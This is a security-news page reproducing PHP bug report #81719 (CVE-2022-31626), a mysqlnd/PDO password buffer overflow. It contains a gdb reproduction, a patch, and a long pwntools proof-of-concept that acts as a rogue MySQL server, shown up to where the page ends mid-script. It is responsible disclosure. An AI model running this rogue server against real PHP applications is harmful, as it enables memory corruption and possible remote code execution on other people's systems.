Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.

CVE
#sql#vulnerability#git#php#rce#buffer_overflow#auth#sap

Sec Bug #81719

mysqlnd/pdo password buffer overflow leading to RCE

Submitted:

2022-05-16 14:33 UTC

Modified:

2022-06-15 07:24 UTC

Votes:

11

Avg. Score:

3.0 ± 1.0

Reproduced:

2 of 2 (100.0%)

Same Version:

2 (100.0%)

Same OS:

2 (100.0%)

From:

c dot fol at ambionics dot io

Assigned:

cmb (profile)

Status:

Closed

Package:

PDO MySQL

PHP Version:

8.1.6

OS:

Private report:

No

CVE-ID:

2022-31626

[2022-05-16 14:33 UTC] c dot fol at ambionics dot io

Description:

Hello PHP team!

INFOS

There’s a buffer overflow here: https://github.com/php/php-src/blob/master/ext/mysqlnd/mysqlnd_wireprotocol.c#L785

It copies `auth_data_len` bytes from `buffer + MYSQLND_HEADER_SIZE`, but only allocates `auth_data_len` bytes.

This bug affects mysqlnd and therefore PDO.

For context, this function copies the user submitted password (`packet->auth_data`) to a buffer in order to send it to a MySQL server. This happens with the legacy auth method that requires you to send a password as raw instead of having some kind of challenge/response logic.

This is exploitable remotely by making PHP connect to a rogue MySQL server. Tools such as Adminer, PHPmyAdmin are affected. Impact is remote code execution.

TEST SCRIPT

I’ve added a fake MySQL Server coded in python to demonstrate the bug at the bottom of this bug report. This should probably be removed before the bug goes public.

Install pwntools (https://github.com/Gallopsled/pwntools#readme), and start it. It’ll wait for connections. Then, you can start PHP in debug mode, with GDB and break on the indicated line:

``` $ gdb --args ./sapi/cli/php -r “new PDO('mysql:host=here.localhost’, 'b’, str_repeat('a’,5000));” (gdb) b mysqlnd_wireprotocol.c:785 (gdb) r ```

As it breaks, you’ll see that the copy happens OOB.

PATCH

Just add the size of the header in the computation.

```

  • zend_uchar * const buffer = pfc->cmd_buffer.length >= packet->auth_data_len? pfc->cmd_buffer.buffer : mnd_emalloc(packet->auth_data_len);
  • size_t total_packet_size = packet->auth_data_len + MYSQLND_HEADER_SIZE;
  • zend_uchar * const buffer = pfc->cmd_buffer.length >= total_packet_size? pfc->cmd_buffer.buffer : mnd_emalloc(total_packet_size); ```

Best regards, Charles Fol ambionics.io

``` #!/usr/bin/env python3

from pwn import *

class ProtoError(Exception): def __init__(self): super().__init__(‘Unknown SQL command’)

class Output: def clear(self): print(‘\r\x1b[K’, end=’’) return self

def \_\_getattr\_\_(self, x):
    def wrapper(msg='', \*args, \*\*kwargs):
        return print(msg.format(\*args), \*\*kwargs)
    return wrapper

out = Output()

def failure(message): out.error(message) exit()

def zend_string_size(s): """When you create a PHP string of N bytes, it will allocate N+25 bytes. “"” return s - 24 - 1

class Handler: """Handles a connection to the fake MySQL server. When the client auths, we change the authentication method to cleartext to trigger the overflow. Otherwise, once we receive a packet, we send back what the client wants to hear. “"” def __init__(self, socket): self.socket = socket self.handle()

def die(self):
    self.socket.close()

def handle(self):
    try:
        self.handle\_handshake()
        while self.handle\_command() != 'quit':
            pass
    except ProtoError:
        raise
    except EOFError:
        #out.failure('EOF')
        pass
    except Exception as e:
        #out.failure('{}: {:}', type(e).\_\_name\_\_, str(e))
        raise
    finally:
        self.socket.close()

def handle\_command(self):
    packet = self.read\_packet()
    command = packet\[0\]

    # Send query
    if command == 0x03:
        self.handle\_query(packet\[1:\])
        return
    # Change DB
    if command == 0x02:
        #out.info('Change DB: {}', packet\[1:\].decode())
        self.send('07 00 00 01 00 00 00 02 00 00 00')
        return
    if command == 0x1b:
        #out.info('Unknown packet')
        self.send('05 00 00 01 fe 00 00 02 00')
        return
    # Quit
    if command == 0x01:
        #out.info('Closing connection')
        return 'quit'

def send(self, data):
    self.socket.send(bytes.fromhex(data.replace(' ', '')))

def read\_packet(self):
    packet\_header = self.socket.recv(4)
    if len(packet\_header) != 4:
        raise ProtoError()
    size = u32(packet\_header) & 0xffffff
    contents = self.socket.recv(size)
    return contents

def handle\_handshake(self):
    #out.success('Got connection, authenticating...')
    self.send('4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf150000000000000000000077315b77715b5315523a274e0063616368696e675f736861325f70617373776f726400')
    self.read\_packet()
    self.send('020000020103')
    # switch auth to cleartext password (pam)
    self.send('16000003FE6d7973716c5f636c6561725f70617373776f726400')
    self.read\_packet()
    self.read\_packet()
    # The overflow :)
    self.socket.recv(4)
    self.send('0700000500000002000000')

def handle\_query(self, query):
    #out.info('Query: {}', query.decode())
    if query.startswith(b'SET '):
        self.send('07 00 00 01 00 00 00 02 00 00 00')
    elif query.startswith(b'SELECT TABLE\_NAME, TABLE\_TYPE'):
        self.send('0100000102480000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f4e414d450a5441424c455f4e414d450cff0000010000fd8110000000480000030364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f545950450a5441424c455f545950450cff002c000000fe811100000005000004fe000002000d00000501610a42415345205441424c451000000604746573740a42415345205441424c4505000007fe00000200')
    elif query.startswith(b'SELECT @@default\_storage\_engine'):
        self.send('01000001012e0000020364656600000018404064656661756c745f73746f726167655f656e67696e65000cff0054550100fd00001f000005000003fe000002000700000406496e6e6f444205000005fe00000200')
    elif query.startswith(b'SHOW COLLATION'):
        self.send('01000001074e0000020364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5309436f6c6c6174696f6e09436f6c6c6174696f6e0cff0000010000fd01100000004a0000030364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e53074368617273657407436861727365740cff0000010000fd0110000000400000040364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530249640249640c3f00140000000821000000004a0000050364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530744656661756c740744656661756c740cff000c000000fd01000000004c0000060364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5308436f6d70696c656408436f6d70696c65640cff000c000000fd01000000004a0000070364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5307536f72746c656e07536f72746c656e0c3f000a000000032110000000560000080364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530d5061645f6174747269627574650d5061645f6174747269627574650cff0024000000fe811100000005000009fe000022002a00000a0c61726d73636969385f62696e0861726d736369693802363400035965730131095041442053504143453400000b1361726d73636969385f67656e6572616c5f63690861726d736369693802333203596573035965730131095041442053504143452400000c0961736369695f62696e05617363696902363500035965730131095041442053504143452e00000d1061736369695f67656e6572616c5f636905617363696902313103596573035965730131095041442053504143452200000e08626967355f62696e046269673502383400035965730131095041442053504143452b00000f0f626967355f6368696e6573655f6369046269673501310359657303596573013109504144205350414345220000100662696e6172790662696e61727902363303596573035965730131064e4f20504144260000110a6370313235305f62696e0663703132353002363600035965730131095041442053504143452e000012126370313235305f63726f617469616e5f63690663703132353002343400035965730131095041442053504143452b0000130f6370313235305f637a6563685f637306637031323530023334000359657301320950414420535041434530000014116370313235305f67656e6572616c5f63690663703132353002323603596573035965730131095041442053504143452c000015106370313235305f706f6c6973685f6369066370313235300239390003596573013109504144205350414345260000160a6370313235315f62696e0663703132353102353000035965730131095041442053504143452f000017136370313235315f62756c67617269616e5f636906637031323531023134000359657301310950414420535041434530000018116370313235315f67656e6572616c5f63690663703132353102353103596573035965730131095041442053504143452d000019116370313235315f67656e6572616c5f63730663703132353102353200035965730131095041442053504143452f00001a136370313235315f756b7261696e69616e5f63690663703132353102323300035965730131095041442053504143452600001b0a6370313235365f62696e0663703132353602363700035965730131095041442053504143453000001c116370313235365f67656e6572616c5f63690663703132353602353703596573035965730131095041442053504143452600001d0a6370313235375f62696e0663703132353702353800035965730131095041442053504143453000001e116370313235375f67656e6572616c5f63690663703132353702353903596573035965730131095041442053504143453000001f146370313235375f6c69746875616e69616e5f6369066370313235370232390003596573013109504144205350414345240000200963703835305f62696e05637038353002383000035965730131095041442053504143452d0000211063703835305f67656e6572616c5f636905637038353001340359657303596573013109504144205350414345240000220963703835325f62696e05637038353202383100035965730131095041442053504143452e0000231063703835325f67656e6572616c5f63690563703835320234300359657303596573013109504144205350414345240000240963703836365f62696e05637038363602363800035965730131095041442053504143452e0000251063703836365f67656e6572616c5f63690563703836360233360359657303596573013109504144205350414345240000260963703933325f62696e05637039333202393600035965730131095041442053504143452f0000271163703933325f6a6170616e6573655f636905637039333202393503596573035965730131095041442053504143452200002808646563385f62696e046465633802363900035965730131095041442053504143452b0000290f646563385f737765646973685f63690464656338013303596573035965730131095041442053504143452800002a0b6575636a706d735f62696e076575636a706d7302393800035965730131095041442053504143453300002b136575636a706d735f6a6170616e6573655f6369076575636a706d7302393703596573035965730131095041442053504143452400002c096575636b725f62696e056575636b7202383500035965730131095041442053504143452d00002d0f6575636b725f6b6f7265616e5f6369056575636b7202313903596573035965730131095041442053504143452900002e0b676231383033305f62696e07676231383033300332343900035965730131095041442053504143453300002f12676231383033305f6368696e6573655f636907676231383033300332343803596573035965730132095041442053504143453400003016676231383033305f756e69636f64655f3532305f63690767623138303330033235300003596573013809504144205350414345260000310a6762323331325f62696e06676232333132023836000359657301310950414420535041434530000032116762323331325f6368696e6573655f6369066762323331320232340359657303596573013109504144205350414345200000330767626b5f62696e0367626b02383700035965730131095041442053504143452a0000340e67626b5f6368696e6573655f63690367626b0232380359657303596573013109504144205350414345280000350b67656f737464385f62696e0767656f737464380239330003596573013109504144205350414345320000361267656f737464385f67656e6572616c5f63690767656f7374643802393203596573035965730131095041442053504143452400003709677265656b5f62696e05677265656b02373000035965730131095041442053504143452e00003810677265656b5f67656e6572616c5f636905677265656b0232350359657303596573013109504144205350414345260000390a6865627265775f62696e0668656272657702373100035965730131095041442053504143453000003a116865627265775f67656e6572616c5f63690668656272657702313603596573035965730131095041442053504143452000003b076870385f62696e0368703802373200035965730131095041442053504143452900003c0e6870385f656e676c6973685f636903687038013603596573035965730131095041442053504143452800003d0b6b6579626373325f62696e076b65796263733202373300035965730131095041442053504143453200003e126b6579626373325f67656e6572616c5f6369076b65796263733202333703596573035965730131095041442053504143452400003f096b6f6938725f62696e056b6f69387202373400035965730131095041442053504143452d000040106b6f6938725f67656e6572616c5f6369056b6f6938720137035965730359657301310950414420535041434524000041096b6f6938755f62696e056b6f69387502373500035965730131095041442053504143452e000042106b6f6938755f67656e6572616c5f6369056b6f6938750232320359657303596573013109504144205350414345260000430a6c6174696e315f62696e066c6174696e3102343700035965730131095041442053504143452c000044106c6174696e315f64616e6973685f6369066c6174696e3102313500035965730131095041442053504143452d000045116c6174696e315f67656e6572616c5f6369066c6174696e3102343800035965730131095041442053504143452d000046116c6174696e315f67656e6572616c5f6373066c6174696e3102343900035965730131095041442053504143452c000047116c6174696e315f6765726d616e315f6369066c6174696e31013500035965730131095041442053504143452d000048116c6174696e315f6765726d616e325f6369066c6174696e3102333100035965730132095041442053504143452d000049116c6174696e315f7370616e6973685f6369066c6174696e3102393400035965730131095041442053504143452f00004a116c6174696e315f737765646973685f6369066c6174696e31013803596573035965730131095041442053504143452600004b0a6c6174696e325f62696e066c6174696e3202373700035965730131095041442053504143452e00004c126c6174696e325f63726f617469616e5f6369066c6174696e3202323700035965730131095041442053504143452a00004d0f6c6174696e325f637a6563685f6373066c6174696e32013200035965730134095041442053504143452f00004e116c6174696e325f67656e6572616c5f6369066c6174696e32013903596573035965730131095041442053504143452f00004f136c6174696e325f68756e67617269616e5f6369066c6174696e320232310003596573013109504144205350414345260000500a6c6174696e355f62696e066c6174696e35023738000359657301310950414420535041434530000051116c6174696e355f7475726b6973685f6369066c6174696e350233300359657303596573013109504144205350414345260000520a6c6174696e375f62696e066c6174696e3702373900035965730131095041442053504143452e000053126c6174696e375f6573746f6e69616e5f6373066c6174696e37023230000359657301310950414420535041434530000054116c6174696e375f67656e6572616c5f6369066c6174696e3702343103596573035965730131095041442053504143452d000055116c6174696e375f67656e6572616c5f6373066c6174696e37023432000359657301310950414420535041434524000056096d616363655f62696e056d6163636502343300035965730131095041442053504143452e000057106d616363655f67656e6572616c5f6369056d6163636502333803596573035965730131095041442053504143452a0000580c6d6163726f6d616e5f62696e086d6163726f6d616e023533000359657301310950414420535041434534000059136d6163726f6d616e5f67656e6572616c5f6369086d6163726f6d616e02333903596573035965730131095041442053504143452200005a08736a69735f62696e04736a697302383800035965730131095041442053504143452d00005b10736a69735f6a6170616e6573655f636904736a697302313303596573035965730131095041442053504143452200005c08737765375f62696e047377653702383200035965730131095041442053504143452c00005d0f737765375f737765646973685f6369047377653702313003596573035965730131095041442053504143452600005e0a7469733632305f62696e0674697336323002383900035965730131095041442053504143452d00005f0e7469733632305f746861695f63690674697336323002313803596573035965730134095041442053504143452200006008756373325f62696e047563733202393000035965730131095041442053504143452b00006110756373325f63726f617469616e5f63690475637332033134390003596573013809504144205350414345280000620d756373325f637a6563685f63690475637332033133380003596573013809504144205350414345290000630e756373325f64616e6973685f636904756373320331333900035965730138095041442053504143452c00006411756373325f6573706572616e746f5f636904756373320331343500035965730138095041442053504143452b00006510756373325f6573746f6e69616e5f636904756373320331333400035965730138095041442053504143452c0000660f756373325f67656e6572616c5f6369047563733202333503596573035965730131095041442053504143453300006718756373325f67656e6572616c5f6d7973716c3530305f636904756373320331353900035965730131095041442053504143452a0000680f756373325f6765726d616e325f636904756373320331343800035965730138095041442053504143452c00006911756373325f68756e67617269616e5f636904756373320331343600035965730138095041442053504143452c00006a11756373325f6963656c616e6469635f636904756373320331323900035965730138095041442053504143452a00006b0f756373325f6c61747669616e5f636904756373320331333000035965730138095041442053504143452d00006c12756373325f6c69746875616e69616e5f636904756373320331343000035965730138095041442053504143452a00006d0f756373325f7065727369616e5f636904756373320331343400035965730138095041442053504143452900006e0e756373325f706f6c6973685f636904756373320331333300035965730138095041442053504143452b00006f10756373325f726f6d616e69616e5f63690475637332033133310003596573013809504144205350414345280000700d756373325f726f6d616e5f636904756373320331343300035965730138095041442053504143452a0000710f756373325f73696e68616c615f63690475637332033134370003596573013809504144205350414345290000720e756373325f736c6f76616b5f636904756373320331343100035965730138095041442053504143452c00007311756373325f736c6f76656e69616e5f636904756373320331333200035965730138095041442053504143452b00007410756373325f7370616e697368325f636904756373320331343200035965730138095041442053504143452a0000750f756373325f7370616e6973685f636904756373320331333500035965730138095041442053504143452a0000760f756373325f737765646973685f636904756373320331333600035965730138095041442053504143452a0000770f756373325f7475726b6973685f636904756373320331333700035965730138095041442053504143452e00007813756373325f756e69636f64655f3532305f636904756373320331353000035965730138095041442053504143452a0000790f756373325f756e69636f64655f636904756373320331323800035965730138095041442053504143452d00007a12756373325f766965746e616d6573655f636904756373320331353100035965730138095041442053504143452200007b08756a69735f62696e04756a697302393100035965730131095041442053504143452d00007c10756a69735f6a6170616e6573655f636904756a697302313203596573035965730131095041442053504143452800007d0b75746631366c655f62696e0775746631366c6502363200035965730131095041442053504143453200007e1275746631366c655f67656e6572616c5f63690775746631366c6502353603596573035965730131095041442053504143452400007f0975746631365f62696e05757466313602353500035965730131095041442053504143452d0000801175746631365f63726f617469616e5f63690575746631360331323200035965730138095041442053504143452a0000810e75746631365f637a6563685f63690575746631360331313100035965730138095041442053504143452b0000820f75746631365f64616e6973685f63690575746631360331313200035965730138095041442053504143452e0000831275746631365f6573706572616e746f5f63690575746631360331313800035965730138095041442053504143452d0000841175746631365f6573746f6e69616e5f63690575746631360331303700035965730138095041442053504143452e0000851075746631365f67656e6572616c5f636905757466313602353403596573035965730131095041442053504143452c0000861075746631365f6765726d616e325f63690575746631360331323100035965730138095041442053504143452e0000871275746631365f68756e67617269616e5f63690575746631360331313900035965730138095041442053504143452e0000881275746631365f6963656c616e6469635f63690575746631360331303200035965730138095041442053504143452c0000891075746631365f6c61747669616e5f63690575746631360331303300035965730138095041442053504143452f00008a1375746631365f6c69746875616e69616e5f63690575746631360331313300035965730138095041442053504143452c00008b1075746631365f7065727369616e5f63690575746631360331313700035965730138095041442053504143452b00008c0f75746631365f706f6c6973685f63690575746631360331303600035965730138095041442053504143452d00008d1175746631365f726f6d616e69616e5f63690575746631360331303400035965730138095041442053504143452a00008e0e75746631365f726f6d616e5f63690575746631360331313600035965730138095041442053504143452c00008f1075746631365f73696e68616c615f63690575746631360331323000035965730138095041442053504143452b0000900f75746631365f736c6f76616b5f63690575746631360331313400035965730138095041442053504143452e0000911275746631365f736c6f76656e69616e5f63690575746631360331303500035965730138095041442053504143452d0000921175746631365f7370616e697368325f63690575746631360331313500035965730138095041442053504143452c0000931075746631365f7370616e6973685f63690575746631360331303800035965730138095041442053504143452c0000941075746631365f737765646973685f63690575746631360331303900035965730138095041442053504143452c0000951075746631365f7475726b6973685f6369057574663136033131300003596573013809504144205350414345300000961475746631365f756e69636f64655f3532305f63690575746631360331323300035965730138095041442053504143452c0000971075746631365f756e69636f64655f63690575746631360331303100035965730138095041442053504143452f0000981375746631')
        self.send('365f766965746e616d6573655f6369057574663136033132340003596573013809504144205350414345240000990975746633325f62696e05757466333202363100035965730131095041442053504143452d00009a1175746633325f63726f617469616e5f63690575746633320331383100035965730138095041442053504143452a00009b0e75746633325f637a6563685f63690575746633320331373000035965730138095041442053504143452b00009c0f75746633325f64616e6973685f63690575746633320331373100035965730138095041442053504143452e00009d1275746633325f6573706572616e746f5f63690575746633320331373700035965730138095041442053504143452d00009e1175746633325f6573746f6e69616e5f63690575746633320331363600035965730138095041442053504143452e00009f1075746633325f67656e6572616c5f636905757466333202363003596573035965730131095041442053504143452c0000a01075746633325f6765726d616e325f63690575746633320331383000035965730138095041442053504143452e0000a11275746633325f68756e67617269616e5f63690575746633320331373800035965730138095041442053504143452e0000a21275746633325f6963656c616e6469635f63690575746633320331363100035965730138095041442053504143452c0000a31075746633325f6c61747669616e5f63690575746633320331363200035965730138095041442053504143452f0000a41375746633325f6c69746875616e69616e5f63690575746633320331373200035965730138095041442053504143452c0000a51075746633325f7065727369616e5f63690575746633320331373600035965730138095041442053504143452b0000a60f75746633325f706f6c6973685f63690575746633320331363500035965730138095041442053504143452d0000a71175746633325f726f6d616e69616e5f63690575746633320331363300035965730138095041442053504143452a0000a80e75746633325f726f6d616e5f63690575746633320331373500035965730138095041442053504143452c0000a91075746633325f73696e68616c615f63690575746633320331373900035965730138095041442053504143452b0000aa0f75746633325f736c6f76616b5f63690575746633320331373300035965730138095041442053504143452e0000ab1275746633325f736c6f76656e69616e5f63690575746633320331363400035965730138095041442053504143452d0000ac1175746633325f7370616e697368325f63690575746633320331373400035965730138095041442053504143452c0000ad1075746633325f7370616e6973685f63690575746633320331363700035965730138095041442053504143452c0000ae1075746633325f737765646973685f63690575746633320331363800035965730138095041442053504143452c0000af1075746633325f7475726b6973685f6369057574663332033136390003596573013809504144205350414345300000b01475746633325f756e69636f64655f3532305f63690575746633320331383200035965730138095041442053504143452c0000b11075746633325f756e69636f64655f63690575746633320331363000035965730138095041442053504143452f0000b21375746633325f766965746e616d6573655f6369057574663332033138330003596573013809504144205350414345300000b312757466386d62345f303930305f61695f636907757466386d62340332353503596573035965730130064e4f205041442d0000b412757466386d62345f303930305f61735f636907757466386d62340333303500035965730130064e4f205041442d0000b512757466386d62345f303930305f61735f637307757466386d62340332373800035965730130064e4f205041442b0000b610757466386d62345f303930305f62696e07757466386d62340333303900035965730131064e4f20504144280000b70b757466386d62345f62696e07757466386d62340234360003596573013109504144205350414345310000b813757466386d62345f63726f617469616e5f636907757466386d6234033234350003596573013809504144205350414345300000b915757466386d62345f63735f303930305f61695f636907757466386d62340332363600035965730130064e4f20504144300000ba15757466386d62345f63735f303930305f61735f637307757466386d62340332383900035965730130064e4f205041442e0000bb10757466386d62345f637a6563685f636907757466386d62340332333400035965730138095041442053504143452f0000bc11757466386d62345f64616e6973685f636907757466386d6234033233350003596573013809504144205350414345300000bd15757466386d62345f64615f303930305f61695f636907757466386d62340332363700035965730130064e4f20504144300000be15757466386d62345f64615f303930305f61735f637307757466386d62340332393000035965730130064e4f20504144330000bf18757466386d62345f64655f70625f303930305f61695f636907757466386d62340332353600035965730130064e4f20504144330000c018757466386d62345f64655f70625f303930305f61735f637307757466386d62340332373900035965730130064e4f20504144300000c115757466386d62345f656f5f303930305f61695f636907757466386d62340332373300035965730130064e4f20504144300000c215757466386d62345f656f5f303930305f61735f637307757466386d62340332393600035965730130064e4f20504144320000c314757466386d62345f6573706572616e746f5f636907757466386d6234033234310003596573013809504144205350414345310000c413757466386d62345f6573746f6e69616e5f636907757466386d6234033233300003596573013809504144205350414345300000c515757466386d62345f65735f303930305f61695f636907757466386d62340332363300035965730130064e4f20504144300000c615757466386d62345f65735f303930305f61735f637307757466386d62340332383600035965730130064e4f20504144350000c71a757466386d62345f65735f747261645f303930305f61695f636907757466386d62340332373000035965730130064e4f20504144350000c81a757466386d62345f65735f747261645f303930305f61735f637307757466386d62340332393300035965730130064e4f20504144300000c915757466386d62345f65745f303930305f61695f636907757466386d62340332363200035965730130064e4f20504144300000ca15757466386d62345f65745f303930305f61735f637307757466386d62340332383500035965730130064e4f205041442f0000cb12757466386d62345f67656e6572616c5f636907757466386d62340234350003596573013109504144205350414345300000cc12757466386d62345f6765726d616e325f636907757466386d6234033234340003596573013809504144205350414345300000cd15757466386d62345f68725f303930305f61695f636907757466386d62340332373500035965730130064e4f20504144300000ce15757466386d62345f68725f303930305f61735f637307757466386d62340332393800035965730130064e4f20504144320000cf14757466386d62345f68756e67617269616e5f636907757466386d6234033234320003596573013809504144205350414345300000d015757466386d62345f68755f303930305f61695f636907757466386d62340332373400035965730130064e4f20504144300000d115757466386d62345f68755f303930305f61735f637307757466386d62340332393700035965730130064e4f20504144320000d214757466386d62345f6963656c616e6469635f636907757466386d6234033232350003596573013809504144205350414345300000d315757466386d62345f69735f303930305f61695f636907757466386d62340332353700035965730130064e4f20504144300000d415757466386d62345f69735f303930305f61735f637307757466386d62340332383000035965730130064e4f20504144300000d515757466386d62345f6a615f303930305f61735f637307757466386d62340333303300035965730130064e4f20504144340000d618757466386d62345f6a615f303930305f61735f63735f6b7307757466386d6234033330340003596573023234064e4f20504144300000d712757466386d62345f6c61747669616e5f636907757466386d6234033232360003596573013809504144205350414345300000d815757466386d62345f6c615f303930305f61695f636907757466386d62340332373100035965730130064e4f20504144300000d915757466386d62345f6c615f303930305f61735f637307757466386d62340332393400035965730130064e4f20504144330000da15757466386d62345f6c69746875616e69616e5f636907757466386d6234033233360003596573013809504144205350414345300000db15757466386d62345f6c745f303930305f61695f636907757466386d62340332363800035965730130064e4f20504144300000dc15757466386d62345f6c745f303930305f61735f637307757466386d62340332393100035965730130064e4f20504144300000dd15757466386d62345f6c765f303930305f61695f636907757466386d62340332353800035965730130064e4f20504144300000de15757466386d62345f6c765f303930305f61735f637307757466386d62340332383100035965730130064e4f20504144300000df12757466386d62345f7065727369616e5f636907757466386d6234033234300003596573013809504144205350414345300000e015757466386d62345f706c5f303930305f61695f636907757466386d62340332363100035965730130064e4f20504144300000e115757466386d62345f706c5f303930305f61735f637307757466386d62340332383400035965730130064e4f205041442f0000e211757466386d62345f706f6c6973685f636907757466386d6234033232390003596573013809504144205350414345310000e313757466386d62345f726f6d616e69616e5f636907757466386d62340332323700035965730138095041442053504143452e0000e410757466386d62345f726f6d616e5f636907757466386d6234033233390003596573013809504144205350414345300000e515757466386d62345f726f5f303930305f61695f636907757466386d62340332353900035965730130064e4f20504144300000e615757466386d62345f726f5f303930305f61735f637307757466386d62340332383200035965730130064e4f20504144300000e715757466386d62345f72755f303930305f61695f636907757466386d62340333303600035965730130064e4f20504144300000e815757466386d62345f72755f303930305f61735f637307757466386d62340333303700035965730130064e4f20504144300000e912757466386d62345f73696e68616c615f636907757466386d6234033234330003596573013809504144205350414345300000ea15757466386d62345f736b5f303930305f61695f636907757466386d62340332363900035965730130064e4f20504144300000eb15757466386d62345f736b5f303930305f61735f637307757466386d62340332393200035965730130064e4f205041442f0000ec11757466386d62345f736c6f76616b5f636907757466386d6234033233370003596573013809504144205350414345320000ed14757466386d62345f736c6f76656e69616e5f636907757466386d6234033232380003596573013809504144205350414345300000ee15757466386d62345f736c5f303930305f61695f636907757466386d62340332363000035965730130064e4f20504144300000ef15757466386d62345f736c5f303930305f61735f637307757466386d62340332383300035965730130064e4f20504144310000f013757466386d62345f7370616e697368325f636907757466386d6234033233380003596573013809504144205350414345300000f112757466386d62345f7370616e6973685f636907757466386d6234033233310003596573013809504144205350414345300000f215757466386d62345f73765f303930305f61695f636907757466386d62340332363400035965730130064e4f20504144300000f315757466386d62345f73765f303930305f61735f637307757466386d62340332383700035965730130064e4f20504144300000f412757466386d62345f737765646973685f636907757466386d6234033233320003596573013809504144205350414345300000f515757466386d62345f74725f303930305f61695f636907757466386d62340332363500035965730130064e4f20504144300000f615757466386d62345f74725f303930305f61735f637307757466386d62340332383800035965730130064e4f20504144300000f712757466386d62345f7475726b6973685f636907757466386d6234033233330003596573013809504144205350414345340000f816757466386d62345f756e69636f64655f3532305f636907757466386d6234033234360003596573013809504144205350414345300000f912757466386d62345f756e69636f64655f636907757466386d6234033232340003596573013809504144205350414345330000fa15757466386d62345f766965746e616d6573655f636907757466386d6234033234370003596573013809504144205350414345300000fb15757466386d62345f76695f303930305f61695f636907757466386d62340332373700035965730130064e4f20504144300000fc15757466386d62345f76695f303930305f61735f637307757466386d62340333303000035965730130064e4f20504144300000fd15757466386d62345f7a685f303930305f61735f637307757466386d62340333303800035965730130064e4f20504144220000fe08757466385f62696e047574663802383300035965730131095041442053504143452b0000ff10757466385f63726f617469616e5f63690475746638033231330003596573013809504144205350414345280000000d757466385f637a6563685f63690475746638033230320003596573013809504144205350414345290000010e757466385f64616e6973685f636904757466380332303300035965730138095041442053504143452c00000211757466385f6573706572616e746f5f636904757466380332303900035965730138095041442053504143452b00000310757466385f6573746f6e69616e5f636904757466380331393800035965730138095041442053504143452c0000040f757466385f67656e6572616c5f6369047574663802333303596573035965730131095041442053504143453300000518757466385f67656e6572616c5f6d7973716c3530305f636904757466380332323300035965730131095041442053504143452a0000060f757466385f6765726d616e325f636904757466380332313200035965730138095041442053504143452c00000711757466385f68756e67617269616e5f636904757466380332313000035965730138095041442053504143452c00000811757466385f6963656c616e6469635f636904757466380331393300035965730138095041442053504143452a0000090f757466385f6c61747669616e5f636904757466380331393400035965730138095041442053504143452d00000a12757466385f6c69746875616e69616e5f636904757466380332303400035965730138095041442053504143452a00000b0f757466385f7065727369616e5f636904757466380332303800035965730138095041442053504143452900000c0e757466385f706f6c6973685f636904757466380331393700035965730138095041442053504143452b00000d10757466385f726f6d616e69616e5f636904757466380331393500035965730138095041442053504143452800000e0d757466385f726f6d616e5f636904757466380332303700035965730138095041442053504143452a00000f0f757466385f73696e68616c615f63690475746638033231310003596573013809504144205350414345290000100e757466385f736c6f76616b5f636904757466380332303500035965730138095041442053504143452c00001111757466385f736c6f76656e69616e5f636904757466380331393600035965730138095041442053504143452b00001210757466385f7370616e697368325f636904757466380332303600035965730138095041442053504143452a0000130f757466385f7370616e6973685f636904757466380331393900035965730138095041442053504143452a0000140f757466385f737765646973685f63690475746638033230300003596573013809504144205350414345290000150f757466385f746f6c6f7765725f6369047574663802373600035965730131095041442053504143452a0000160f757466385f7475726b6973685f636904757466380332303100035965730138095041442053504143452e00001713757466385f756e69636f64655f3532305f636904757466380332313400035965730138095041442053504143452a0000180f757466385f756e69636f64655f636904757466380331393200035965730138095041442053504143452d00001912757466385f766965746e616d6573655f636904757466380332313500035965730138095041442053504143450500001afe00002200')
    elif query.startswith(b'SHOW CREATE DATABASE'):
        self.send('01000001021e00000203646566000000084461746162617365000cff0000010000fd01001f000025000003036465660000000f437265617465204461746162617365000cff0000100000fd01001f000005000004fe000002008400000504746573747e43524541544520444154414241534520607465737460202f2a2134303130302044454641554c54204348415241435445522053455420757466386d623420434f4c4c41544520757466386d62345f303930305f61695f6369202a2f202f2a2138303031362044454641554c5420454e4352595054494f4e3d274e27202a2f05000006fe00000200')
    elif query.startswith(b'SELECT ROUTINE\_NAME AS'):
        self.send('0100000104510000020364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530d53504543494649435f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000030364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000040364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f545950450c524f5554494e455f545950450cff0024000000fe815100000042000005036465660008524f5554494e455308524f5554494e45530e4454445f4944454e5449464945520e4454445f4944454e5449464945520cff00f4ffff0bfc80001f000005000006fe0000020005000007fe00000200')
    elif query.startswith(b'SHOW EVENTS'):
